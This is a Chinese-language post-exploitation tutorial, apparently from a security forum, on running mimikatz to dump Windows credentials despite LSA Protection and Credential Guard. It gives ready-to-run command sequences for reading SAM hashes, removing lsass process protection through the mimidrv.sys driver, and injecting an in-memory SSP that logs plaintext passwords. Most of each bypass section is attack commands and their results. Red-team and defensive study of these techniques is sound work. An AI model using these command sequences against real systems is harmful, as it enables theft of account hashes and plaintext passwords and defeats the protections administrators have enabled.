在渗透过程中,获得一台windows机器权限之后,很重要一个环节就是抓密码。 但是在使用mimikatz抓取系统账号密码时,有时运维人员会开启一些防护措施,导致mimikatz抓取失败或异常。 本文主要几种mimikatz运行方式,来bypass LSA Protection 和Credential Guard获取密码。

Bypass LSA Protection

自Windows 8.1 开始为LSA提供了额外的保护(LSA Protection),以防止读取内存和不受保护的进程注入代码。保护模式要求所有加载到LSA的插件都必须使用Microsoft签名进行数字签名。 在LSA Protection保护模式下,mimikatz运行 sekurlsa::logonpasswords抓取密码会报错。

1) 开启 LSA Protection

测试环境:Windows 10 X64

可以通过注册表开启LSA Protection,注册表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
新建-DWORD(32)值,名称为 RunAsPPL,数值为 00000001,然后重启系统生效。

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RunAsPPL" /t REG_DWORD /d "00000001" /f

验证LSA是否以保护模式启动,查看系统日志,事件id为12-LSASS.exe作为受保护的进程启动:

2) LSA Protection运行下的sekurlsa::logonpasswords

在开启LSA Protection时,mimikatz运行 sekurlsa::logonpasswords会报错 “ERROR kuhl_m_sekurlsa_acquireLSA;Handle on memery”

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

3) lsadump::sam bypass

mimikatz 运行 lsadump :: sam 从磁盘上的SAM读取凭据,可成功pypass LSA Protection,读取到用户哈希

mimikatz # privilege::debug
mimikatz # token::whoami
mimikatz # token::elevate
mimikatz # lsadump::sam

4) mimidrv.sys bypass

mimikatz其中的mimidrv.sys驱动程序,可从lsass.exe进程中删除LSA保护,成功pypass LSA Protection。

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

Bypass Credential Guard

在Windows 10和Windows Server 2016中,Microsoft启用Credential Guard(凭据防护),使用基于虚拟化技术来保护和隔离lsass进程,以保护凭证。启用Credential Guard后,lsass包含2个进程:正常LSA进程和隔离LSA进程(在VSM中运行)。

1) 开启Credential Guard

测试环境:Windows 10 X64

可以使用组策略启用Windows Defender凭据保护:
在组策略管理控制台中,在”计算机配置” -> “管理模板” -> “系统” -> “Device Guard”,打开”打开基于虚拟化的安全”,选择”已启用”;
在”选择平台安全级别”框中,选择”安全启动”或”安全启动和DMA保护”;
在”凭据保护配置”框中,选择”使用UEFI锁启用”。如果希望能够远程关闭Windows Defender Credential Guard,选择”无锁启用”。
运行gpupdate /force 强制执行组策略

验证Windows Defender Credential Guard是否运行:
输入msinfo32.exe,在 ”系统摘要”-> ”已配置基于虚拟化的安全服务”处,可看到显示”Credential Guard”

2) Credential Guard运行下的sekurlsa::logonpasswords

在开启Credential Guard时 mimikatz运行 sekurlsa::logonpasswords,经测试,可以抓到部分用户哈希,但是存在缺陷:1)抓取到的用户不全,有遗漏 2)抓不到密码明文

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

只抓取其中一个用户lltest的哈希,缺失了用户lltest2,并且没有了之前的明文:

3 ) lsadump::sam bypass

mimikatz 运行 lsadump :: sam 从磁盘上的SAM读取凭据,可成功bypass Credential Guard,读取到全部的用户哈希

mimikatz # privilege::debug
mimikatz # token::whoami
mimikatz # token::elevate
mimikatz # lsadump::sam

新增抓到了用户lltest2的哈希:

4) misc::memssp bypass

SSP是参与用户身份验证的Microsoft软件包,如在用户登录时被调用,并接收该用户的凭据。在系统启动时SSP会被加载到进程lsass.exe中。

Mimikatz可通过内存安装自定义的ssp,修改lsass进程的内存,实现从lsass进程中提取凭据,mimikatz执行misc::memssp后,如果再输入了新的凭据(如用户锁屏后重新登录),将会在c:\windows\system32下生成文件mimilsa.log,其中保存有用户明文密码。

mimikatz # privilege::debug
mimikatz # misc::memssp


锁屏后,重新登陆,成功记录到用户密码明文:

补充:此外 还可以尝试mimikatz的 lsadump::secrets 从注册表中获取syskey信息来解密、以及PwDump7 、QuarksPwDump等工具来bypass LSA Protection和Credential Guard。

参考

https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage
https://blog.nviso.be/2018/01/09/windows-credential-guard-mimikatz/
https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a
https://blogs.jpcert.or.jp/en/2016/10/verification-of-ad9d.html

点击收藏 | 3 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖